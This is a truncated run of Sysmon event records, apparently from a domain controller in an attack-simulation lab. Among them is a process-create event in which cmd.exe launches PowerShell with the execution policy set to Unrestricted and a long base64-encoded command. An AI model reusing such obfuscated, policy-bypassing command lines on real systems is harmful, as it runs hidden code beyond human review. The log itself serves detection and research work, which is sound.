C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4845,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4846,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4847,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-20CD-5F25-0000-0010BFA10700}\r\nSourceProcessId: 4376\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-00102BA40700}\r\nTargetProcessId: 3744\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-20CD-5F25-0000-0010BFA10700}","SourceProcessId":"4376","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-00102BA40700}","TargetProcessId":"3744","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4848,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.214\r\nProcessGuid: {41C8662E-20CD-5F25-0000-0010FEA40700}\r\nProcessId: 4544\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CD-5F25-0000-002017A10700}\r\nLogonId: 0x7A117\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {41C8662E-20CD-5F25-0000-00102BA40700}\r\nParentProcessId: 3744\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.214","ProcessGuid":"{41C8662E-20CD-5F25-0000-0010FEA40700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgB